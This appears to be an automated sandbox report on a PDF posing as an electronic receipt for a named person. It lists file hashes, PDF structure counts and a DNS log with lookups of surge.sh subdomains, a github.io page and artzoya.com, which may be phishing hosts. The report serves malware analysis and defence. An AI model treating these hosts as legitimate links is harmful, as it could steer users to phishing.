                                                                                                                                                                                                                                                                                          Preview:......JFIF............................................................ .........!%!.%...................................................(...((((..(..(.(.(......'...."........................................>.......................!..1..AQaq"2...Rr....#B...b.3C..c.$S................................&.......................!1...AQ.a"2qB............?..x..)~i}H.......A..@....`4]..b.`.W..........M.....y.W..%.c.8..}.Wp....~%W.j...Y.9...D.!......`!..........@....... . ....................................P........t...$P........S.$i.h..J.0F.{.._k.r|...n.....N..p..........ly.....l..M..>R.H..t[CQ.&.h.q!..yD.Bh.h.#V.h..D.H.h.Q ..M(....4.".%2...i.g.X.TRA.ZD..*5.&.3h(..\.G).&.*.*.F.....J.@d.-.4K@b..4.m..kD.63b..A!....m4A(.....:%.V.h..Z%. EPP...M....QD...X.B...-...4..T&.......P.@].. .h(..) .......PR..EE.....PQ@.$....&.AE$.E.$TK.E ...H.."..F.[.u.%#Lku..;.............F........h+2F...A.z.Y!.h.`u8?Te_Y?...&..A.....#....g.sH...9&Ed.S$2........Lb` .(.............@0..0 ........C....P..
                                                                                                                                                                                                                                                                                          File type:PDF document, version 1.4, 1 pages
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897601185843962
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Adobe Portable Document Format (5005/1) 100.00%
                                                                                                                                                                                                                                                                                          File name:Electronic Receipt for Carolann Campbell.pdf
                                                                                                                                                                                                                                                                                          File size:71'811 bytes
                                                                                                                                                                                                                                                                                          MD5:677f99c2bfd3de62e11ac90c44254fc8
                                                                                                                                                                                                                                                                                          SHA1:0544869264904f703f52dc79b507a8594cfe4c44
                                                                                                                                                                                                                                                                                          SHA256:f728d07cf9ee8f30fadd0c9e389cb1a4c1d94c03ec68fd976e917146aea33873
                                                                                                                                                                                                                                                                                          SHA512:ebbf1e2d8ca7447e9344dce955c475e89265d141d8e3fd694a876b5e0b85161937f437b76854af8731f34fd773eed0e35a390932a58fd9f338b126bf00260cc0
                                                                                                                                                                                                                                                                                          SSDEEP:1536:YfJ4eW93c4KC6JUm9ovshIUywWv8QUoZV61/cYf9:YWeW98C679hIUywWv8Q3b2f9
                                                                                                                                                                                                                                                                                          TLSH:5B63DF7BE80837ACC795C7D2EE233687697D70E90F8696CB1E2C8991280C504DBBF561
                                                                                                                                                                                                                                                                                          File Content Preview:%PDF-1.4.............. ! . ..... . . . . . . ........ . O Hk KLL 9 2 OH X E # e -=K %g d Q P j` G` { 9( C3 _ 1ZTkrf 7 _)J> U0 ] o d {E BYn ......................................
                                                                                                                                                                                                                                                                                          Icon Hash:62cc8caeb29e8ae0

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Header:%PDF-1.4Ã\x90
                                                                                                                                                                                                                                                                                          Total Entropy:7.897601
                                                                                                                                                                                                                                                                                          Total Bytes:71811
                                                                                                                                                                                                                                                                                          Stream Entropy:7.995244
                                                                                                                                                                                                                                                                                          Stream Bytes:61519
                                                                                                                                                                                                                                                                                          Entropy outside Streams:5.135359
                                                                                                                                                                                                                                                                                          Bytes outside Streams:10292
                                                                                                                                                                                                                                                                                          Number of EOF found:1
                                                                                                                                                                                                                                                                                          Bytes after EOF:
                                                                                                                                                                                                                                                                                          NameCount
                                                                                                                                                                                                                                                                                          obj31
                                                                                                                                                                                                                                                                                          endobj31
                                                                                                                                                                                                                                                                                          stream10
                                                                                                                                                                                                                                                                                          endstream10
                                                                                                                                                                                                                                                                                          xref1
                                                                                                                                                                                                                                                                                          trailer1
                                                                                                                                                                                                                                                                                          startxref1
                                                                                                                                                                                                                                                                                          /Page1
                                                                                                                                                                                                                                                                                          /Encrypt0
                                                                                                                                                                                                                                                                                          /ObjStm0
                                                                                                                                                                                                                                                                                          /URI14
                                                                                                                                                                                                                                                                                          /JS0
                                                                                                                                                                                                                                                                                          /JavaScript0
                                                                                                                                                                                                                                                                                          /AA0
                                                                                                                                                                                                                                                                                          /OpenAction0
                                                                                                                                                                                                                                                                                          /AcroForm0
                                                                                                                                                                                                                                                                                          /JBIG2Decode0
                                                                                                                                                                                                                                                                                          /RichMedia0
                                                                                                                                                                                                                                                                                          /Launch0
                                                                                                                                                                                                                                                                                          /EmbeddedFile0

                                                                                                                                                                                                                                                                                          Image Streams

                                                                                                                                                                                                                                                                                          IDDHASHMD5Preview
                                                                                                                                                                                                                                                                                          60000000000000000fdda827b0288c9be4e93817da3e71081
                                                                                                                                                                                                                                                                                          80404062a6c525e060d3ea7540d369c250d3397855404bb59
                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:49.472121954 CEST192.168.2.71.1.1.10x57d0Standard query (0)equable-toothpaste.surge.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:49.472439051 CEST192.168.2.71.1.1.10x37d4Standard query (0)equable-toothpaste.surge.sh65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.793917894 CEST192.168.2.71.1.1.10x1ff1Standard query (0)sharedfiles2.github.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.794096947 CEST192.168.2.71.1.1.10x41e1Standard query (0)sharedfiles2.github.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:51.638699055 CEST192.168.2.71.1.1.10x860eStandard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:51.638772964 CEST192.168.2.71.1.1.10xf1beStandard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.827011108 CEST192.168.2.71.1.1.10xdb06Standard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.827167988 CEST192.168.2.71.1.1.10x5f12Standard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.913157940 CEST192.168.2.71.1.1.10xf0acStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.913415909 CEST192.168.2.71.1.1.10xa32cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:00.868562937 CEST192.168.2.71.1.1.10xd2b0Standard query (0)tasty-library.surge.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:00.868741989 CEST192.168.2.71.1.1.10x72baStandard query (0)tasty-library.surge.sh65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:01.913028955 CEST192.168.2.71.1.1.10xf796Standard query (0)artzoya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:01.913233042 CEST192.168.2.71.1.1.10xaa00Standard query (0)artzoya.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:08.565288067 CEST192.168.2.71.1.1.10x8c4Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:08.565479040 CEST192.168.2.71.1.1.10x958dStandard query (0)google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:10.611036062 CEST192.168.2.71.1.1.10x4c91Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:10.611238003 CEST192.168.2.71.1.1.10x8dbbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.119574070 CEST192.168.2.71.1.1.10xd957Standard query (0)ogs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.119776964 CEST192.168.2.71.1.1.10xf5d1Standard query (0)ogs.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.130150080 CEST192.168.2.71.1.1.10xefe4Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.130595922 CEST192.168.2.71.1.1.10xdb5bStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.102649927 CEST192.168.2.71.1.1.10x486eStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.102859020 CEST192.168.2.71.1.1.10xb6e1Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.351227999 CEST192.168.2.71.1.1.10xebc9Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.351398945 CEST192.168.2.71.1.1.10x6b45Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:19.108112097 CEST192.168.2.71.1.1.10x9fc3Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:19.108309031 CEST192.168.2.71.1.1.10x83d6Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:32.583745956 CEST192.168.2.71.1.1.10x411aStandard query (0)recovertogether.withgoogle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:32.585057020 CEST192.168.2.71.1.1.10x8a61Standard query (0)recovertogether.withgoogle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.705112934 CEST192.168.2.71.1.1.10xe64eStandard query (0)recovertogether.withgoogle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.705306053 CEST192.168.2.71.1.1.10x3836Standard query (0)recovertogether.withgoogle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.845535040 CEST192.168.2.71.1.1.10xb127Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.845805883 CEST192.168.2.71.1.1.10x9697Standard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:37.312314034 CEST192.168.2.71.1.1.10xce41Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:37.312469959 CEST192.168.2.71.1.1.10x1d0fStandard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.365004063 CEST192.168.2.71.1.1.10x99a8Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.365305901 CEST192.168.2.71.1.1.10xaaf1Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.309793949 CEST192.168.2.71.1.1.10x8c82Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.309963942 CEST192.168.2.71.1.1.10x17c6Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:44.618680000 CEST192.168.2.71.1.1.10x19d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:44.618840933 CEST192.168.2.71.1.1.10x8560Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.710767984 CEST192.168.2.71.1.1.10x5d69Standard query (0)sustainability.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.710920095 CEST192.168.2.71.1.1.10xedcaStandard query (0)sustainability.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.660588026 CEST192.168.2.71.1.1.10xbb0bStandard query (0)sustainability.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.660780907 CEST192.168.2.71.1.1.10x8beStandard query (0)sustainability.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:54.248897076 CEST192.168.2.71.1.1.10xedcdStandard query (0)www.blog.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:54.249064922 CEST192.168.2.71.1.1.10x1c1cStandard query (0)www.blog.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.594158888 CEST192.168.2.71.1.1.10x6680Standard query (0)blog.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.594284058 CEST192.168.2.71.1.1.10x1f93Standard query (0)blog.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.417792082 CEST192.168.2.71.1.1.10x2bdaStandard query (0)blog.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.418091059 CEST192.168.2.71.1.1.10x504bStandard query (0)blog.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.495608091 CEST192.168.2.71.1.1.10xbf33Standard query (0)googletagmanager.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.495810986 CEST192.168.2.71.1.1.10x7309Standard query (0)googletagmanager.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.653539896 CEST192.168.2.71.1.1.10xac0eStandard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.653670073 CEST192.168.2.71.1.1.10xa9aeStandard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:29.952378035 CEST192.168.2.71.1.1.10x2b04Standard query (0)csp.withgoogle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:29.952528954 CEST192.168.2.71.1.1.10x8956Standard query (0)csp.withgoogle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:33.699254990 CEST192.168.2.71.1.1.10xef67Standard query (0)mail.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:33.699390888 CEST192.168.2.71.1.1.10x27feStandard query (0)mail.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:38.646554947 CEST192.168.2.71.1.1.10x5c1dStandard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:38.646719933 CEST192.168.2.71.1.1.10xe611Standard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:38.733695984 CEST192.168.2.71.1.1.10x6f99Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:38.734062910 CEST192.168.2.71.1.1.10xac5dStandard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:38.890635014 CEST192.168.2.71.1.1.10x80d7Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:50.277615070 CEST192.168.2.71.1.1.10xb5e6Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:50.277786016 CEST192.168.2.71.1.1.10xa595Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:51.262656927 CEST192.168.2.71.1.1.10x5778Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:51.262928009 CEST192.168.2.71.1.1.10xc353Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:54.346112013 CEST192.168.2.71.1.1.10xa994Standard query (0)smallbusiness.withgoogle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:54.346388102 CEST192.168.2.71.1.1.10xdc71Standard query (0)smallbusiness.withgoogle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.551691055 CEST192.168.2.71.1.1.10xa80cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.551896095 CEST192.168.2.71.1.1.10xf016Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.560535908 CEST192.168.2.71.1.1.10x2b8cStandard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.560736895 CEST192.168.2.71.1.1.10x543cStandard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:56.619210005 CEST192.168.2.71.1.1.10x3efaStandard query (0)smallbusiness.withgoogle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:56.619590044 CEST192.168.2.71.1.1.10xec3Standard query (0)smallbusiness.withgoogle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:01.594855070 CEST192.168.2.71.1.1.10x245eStandard query (0)survey.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:01.595099926 CEST192.168.2.71.1.1.10x2f9fStandard query (0)survey.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:03.099467039 CEST192.168.2.71.1.1.10xbe5eStandard query (0)about.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:03.099467039 CEST192.168.2.71.1.1.10x4bccStandard query (0)about.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.171075106 CEST192.168.2.71.1.1.10xe291Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.171327114 CEST192.168.2.71.1.1.10xe580Standard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.912398100 CEST192.168.2.71.1.1.10xc36fStandard query (0)about.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.913223028 CEST192.168.2.71.1.1.10xd6e5Standard query (0)about.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:13.945504904 CEST192.168.2.71.1.1.10x1c96Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:44.661566973 CEST192.168.2.71.1.1.10x41c2Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:49.493588924 CEST1.1.1.1192.168.2.70x57d0No error (0)equable-toothpaste.surge.sh188.166.132.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.284928083 CEST1.1.1.1192.168.2.70x37d4Server failure (2)equable-toothpaste.surge.shnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.803072929 CEST1.1.1.1192.168.2.70x1ff1No error (0)sharedfiles2.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.803072929 CEST1.1.1.1192.168.2.70x1ff1No error (0)sharedfiles2.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.803072929 CEST1.1.1.1192.168.2.70x1ff1No error (0)sharedfiles2.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:50.803072929 CEST1.1.1.1192.168.2.70x1ff1No error (0)sharedfiles2.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:51.645550966 CEST1.1.1.1192.168.2.70xf1beNo error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:51.645674944 CEST1.1.1.1192.168.2.70x860eNo error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:51.645674944 CEST1.1.1.1192.168.2.70x860eNo error (0)dualstack.twimg.twitter.map.fastly.net199.232.188.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.833836079 CEST1.1.1.1192.168.2.70xdb06No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.833836079 CEST1.1.1.1192.168.2.70xdb06No error (0)dualstack.twimg.twitter.map.fastly.net199.232.188.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.834700108 CEST1.1.1.1192.168.2.70x5f12No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.920259953 CEST1.1.1.1192.168.2.70xf0acNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:40:52.921356916 CEST1.1.1.1192.168.2.70xa32cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:00.892302036 CEST1.1.1.1192.168.2.70xd2b0No error (0)tasty-library.surge.sh138.197.235.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:01.864132881 CEST1.1.1.1192.168.2.70x72baServer failure (2)tasty-library.surge.shnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:01.935739040 CEST1.1.1.1192.168.2.70xf796No error (0)artzoya.com88.135.68.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:08.573218107 CEST1.1.1.1192.168.2.70x958dNo error (0)google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:08.573761940 CEST1.1.1.1192.168.2.70x8c4No error (0)google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:10.618307114 CEST1.1.1.1192.168.2.70x8dbbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:10.618679047 CEST1.1.1.1192.168.2.70x4c91No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.127096891 CEST1.1.1.1192.168.2.70xf5d1No error (0)ogs.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.127114058 CEST1.1.1.1192.168.2.70xd957No error (0)ogs.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.127114058 CEST1.1.1.1192.168.2.70xd957No error (0)www3.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.137129068 CEST1.1.1.1192.168.2.70xefe4No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.137129068 CEST1.1.1.1192.168.2.70xefe4No error (0)plus.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:17.138906956 CEST1.1.1.1192.168.2.70xdb5bNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.110996962 CEST1.1.1.1192.168.2.70x486eNo error (0)play.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.358624935 CEST1.1.1.1192.168.2.70xebc9No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.358624935 CEST1.1.1.1192.168.2.70xebc9No error (0)plus.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:18.358644009 CEST1.1.1.1192.168.2.70x6b45No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:19.116467953 CEST1.1.1.1192.168.2.70x9fc3No error (0)play.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:32.594285965 CEST1.1.1.1192.168.2.70x411aNo error (0)recovertogether.withgoogle.com142.250.185.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.727132082 CEST1.1.1.1192.168.2.70xe64eNo error (0)recovertogether.withgoogle.com172.217.18.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.852622986 CEST1.1.1.1192.168.2.70x9697No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.853795052 CEST1.1.1.1192.168.2.70xb127No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:35.853795052 CEST1.1.1.1192.168.2.70xb127No error (0)googlehosted.l.googleusercontent.com142.250.184.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:37.320347071 CEST1.1.1.1192.168.2.70xce41No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:37.320347071 CEST1.1.1.1192.168.2.70xce41No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:37.320367098 CEST1.1.1.1192.168.2.70x1d0fNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.372509956 CEST1.1.1.1192.168.2.70xaaf1No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.372509956 CEST1.1.1.1192.168.2.70xaaf1No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
